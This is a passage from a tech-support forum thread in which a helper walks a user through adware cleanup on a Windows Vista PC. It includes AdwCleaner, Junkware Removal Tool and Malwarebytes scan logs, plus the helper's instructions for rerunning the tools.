Key Found:  HKCU\Software\Microsoft\Internet Explorer\DOMStorage\citysearch.com
Key Found:  HKCU\Software\Microsoft\Internet Explorer\DOMStorage\hiphopmyway.com
Key Found:  HKLM\SOFTWARE\Classes\PopCapLoader.PopCapLoaderCtrl2
Key Found:  HKLM\SOFTWARE\Classes\PopCapLoader.PopCapLoaderCtrl2.1
Key Found:  HKLM\SOFTWARE\Classes\Sample.BrowserHandler
Key Found:  HKLM\SOFTWARE\Classes\Sample.BrowserHandler.1
Key Found:  HKLM\SOFTWARE\Classes\Sample.YTBPartnerSample
Key Found:  HKLM\SOFTWARE\Classes\Sample.YTBPartnerSample.1
Key Found:  HKLM\SOFTWARE\Classes\YBrowserToolbar.YBrowserToolbar
Key Found:  HKLM\SOFTWARE\Classes\YBrowserToolbar.YBrowserToolbar.1
Key Found:  [x64] HKLM\SOFTWARE\LevelQualityWatcher
Key Found:  [x64] HKLM\SOFTWARE\RrSavings
Key Found:  HKU\S-1-5-21-1231050607-2223395895-1768608861-1000\Software\OB
Key Found:  HKU\S-1-5-21-1231050607-2223395895-1768608861-1000\Software\SearchProtectINT
Key Found:  HKU\S-1-5-21-1231050607-2223395895-1768608861-1000\Software\W3I
Key Found:  HKU\S-1-5-21-1231050607-2223395895-1768608861-1000\Software\Yahoo\Companion
Key Found:  HKU\S-1-5-21-1231050607-2223395895-1768608861-1000\Software\Yahoo\YFriendsBar
Key Found:  HKU\S-1-5-21-1231050607-2223395895-1768608861-1000\Software\YahooPartnerToolbar
Key Found:  HKU\S-1-5-21-1231050607-2223395895-1768608861-1000\Software\AppDataLow\Software\Rr Savings
Key Found:  HKU\S-1-5-21-1231050607-2223395895-1768608861-1000\Software\AppDataLow\Software\Yahoo\Companion
Key Found:  HKCU\Software\Microsoft\Internet Explorer\InternetRegistry\REGISTRY\USER\S-1-5-21-1231050607-2223395895-1768608861-1000\Software\Wajam
Key Found:  HKCU\Software\Microsoft\Internet Explorer\InternetRegistry\REGISTRY\USER\S-1-5-21-1231050607-2223395895-1768608861-1000\Software\Yahoo\YFriendsBar
Key Found:  HKCU\Software\OB
Key Found:  HKCU\Software\SearchProtectINT
Key Found:  HKCU\Software\W3I
Key Found:  HKCU\Software\Yahoo\Companion
Key Found:  HKCU\Software\Yahoo\YFriendsBar
Key Found:  HKCU\Software\YahooPartnerToolbar
Key Found:  HKCU\Software\AppDataLow\Software\Rr Savings
Key Found:  HKCU\Software\AppDataLow\Software\Yahoo\Companion
Key Found:  HKLM\SOFTWARE\Freeze.com
Key Found:  HKLM\SOFTWARE\RrFilter
Key Found:  HKLM\SOFTWARE\Viewpoint
Key Found:  HKLM\SOFTWARE\W3I
Key Found:  HKLM\SOFTWARE\Yahoo\Companion
Key Found:  HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Viewpoint Manager
Key Found:  HKU\S-1-5-21-1231050607-2223395895-1768608861-1000\Software\Microsoft\Internet Explorer\SearchScopes\{D943EABA-8E9F-40BE-861D-26636C0303F1}
Key Found:  HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{D943EABA-8E9F-40BE-861D-26636C0303F1}
Key Found:  HKCU\Software\Microsoft\Internet Explorer\DOMStorage\azlyrics.com
Key Found:  HKCU\Software\Microsoft\Internet Explorer\DOMStorage\bizitool.com
Key Found:  HKCU\Software\Microsoft\Internet Explorer\DOMStorage\cmptch.com
Key Found:  HKCU\Software\Microsoft\Internet Explorer\DOMStorage\hiphopmyway.com
Key Found:  HKCU\Software\Microsoft\Internet Explorer\DOMStorage\metrolyrics.com
Key Found:  HKCU\Software\Microsoft\Internet Explorer\DOMStorage\veoh.com
Key Found:  HKLM\SOFTWARE\Google\Chrome\Extensions\jpmbfleldcgkldadpdinhjjopdfpjfjp


***** [ Web browsers ] *****

No malicious Firefox based browser items found.
Chrome pref Found:  [C:\Users\JHS-JJS\AppData\Local\Google\Chrome\User Data\Default\Web data] - trovi.search

*************************

C:\AdwCleaner\AdwCleaner[S0].txt - [8300 Bytes] - [31/08/2016 12:20:42]

########## EOF - C:\AdwCleaner\AdwCleaner[S0].txt - [8373 Bytes] ##########
 




#11
[email protected]

Junkware log

 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Malwarebytes
Version: 8.0.7 (07.03.2016)
Operating System: Windows ™ Vista Home Premium x64
Ran by JHS-JJS (Administrator) on Wed 08/31/2016 at 12:59:07.40
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




File System: 29

Successfully deleted: C:\ProgramData\aol toolbar (Folder)
Successfully deleted: C:\ProgramData\mntemp (File)
Successfully deleted: C:\ProgramData\w3i (Folder)
Successfully deleted: C:\Users\JHS-JJS\AppData\Local\aol toolbar (Folder)
Successfully deleted: C:\Users\JHS-JJS\AppData\Local\Google\Chrome\User Data\Default\Extensions\jpmbfleldcgkldadpdinhjjopdfpjfjp (Folder)
Successfully deleted: C:\Users\JHS-JJS\AppData\Local\wajam (Folder)
Successfully deleted: C:\Users\JHS-JJS\AppData\Roaming\Mozilla\Firefox\Profiles\w9t2iu8p.default-1450825045209\searchplugins\norton-safe-search.xml (File)
Successfully deleted: C:\Users\JHS-JJS\Documents\my pagemanager (Folder)
Successfully deleted: C:\Windows\system32\newsoft (File)
Successfully deleted: C:\Program Files (x86)\aol toolbar (Folder)
Successfully deleted: C:\Program Files (x86)\w3i (Folder)
Successfully deleted: C:\Program Files\002 (Folder)
Successfully deleted: C:\Program Files\aol toolbar (Folder)
Successfully deleted: C:\Users\JHS-JJS\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\71S8II66 (Temporary Internet Files Folder)
Successfully deleted: C:\Users\JHS-JJS\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\777EA2QE (Temporary Internet Files Folder)
Successfully deleted: C:\Users\JHS-JJS\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\QE8ANRR0 (Temporary Internet Files Folder)
Successfully deleted: C:\Users\JHS-JJS\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RLX83197 (Temporary Internet Files Folder)
Successfully deleted: C:\Users\JHS-JJS\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S1DRQ0MV (Temporary Internet Files Folder)
Successfully deleted: C:\Users\JHS-JJS\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VDEX4EDG (Temporary Internet Files Folder)
Successfully deleted: C:\Users\JHS-JJS\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\W1OL4E84 (Temporary Internet Files Folder)
Successfully deleted: C:\Users\JHS-JJS\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WK181L0K (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\71S8II66 (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\777EA2QE (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\QE8ANRR0 (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RLX83197 (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S1DRQ0MV (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VDEX4EDG (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\W1OL4E84 (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WK181L0K (Temporary Internet Files Folder)

Deleted the following from C:\Users\JHS-JJS\AppData\Roaming\Mozilla\Firefox\Profiles\w9t2iu8p.default-1450825045209\prefs.js
user_pref(browser.urlbar.suggest.searches, true);



Registry: 2

Successfully deleted: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\\InstallIQUpdater (Registry Value)
Successfully deleted: HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Search\\SearchAssistant (Registry Value)




~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on Wed 08/31/2016 at 13:03:52.25
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 



#12
zep516

Looking good.

Waiting for Malwarebytes log.

On AdwCleaner:
Please re-run it, click Scan, and let it scan again. When the scan finishes, click Log file; when the log opens, click Clean. No need to post the log.

#13
[email protected]

Malwarebytes Anti-Malware
www.malwarebytes.org

Scan Date: 8/31/2016
Scan Time: 2:09:39 PM
Logfile: malwarebytescan.txt
Administrator: Yes

Version: 0.0.0.0000
Malware Database: v2016.08.31.06
Rootkit Database: v2016.08.15.01
License: Trial
Malware Protection: Enabled
Malicious Website Protection: Enabled
Self-protection: Disabled

OS: Windows Vista Service Pack 2
CPU: x64
File System: NTFS
User: JHS-JJS

Scan Type: Threat Scan
Result: Completed
Objects Scanned: 328871
Time Elapsed: 25 min, 29 sec

Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Enabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled

Processes: 0
(No malicious items detected)

Modules: 0
(No malicious items detected)

Registry Keys: 0
(No malicious items detected)

Registry Values: 0
(No malicious items detected)

Registry Data: 0
(No malicious items detected)

Folders: 0
(No malicious items detected)

Files: 0
(No malicious items detected)

Physical Sectors: 0
(No malicious items detected)


(end)



#14
zep516

Is Norton still complaining?


When you get time,

Re-run Farbar Recovery Scan Tool (FRST/FRST64) you ran at the very beginning of this topic.
  • Double-click to run it. When the tool opens click Yes to disclaimer.
  • Make sure you checkmark the Addition.txt box.
  • Press the Scan button.
  • The scan will create two logs, FRST.txt and Addition.txt, in the same directory the tool is run from. Please copy and paste them to your reply.


#15
[email protected]

OK, ran AdwCleaner again as instructed :)

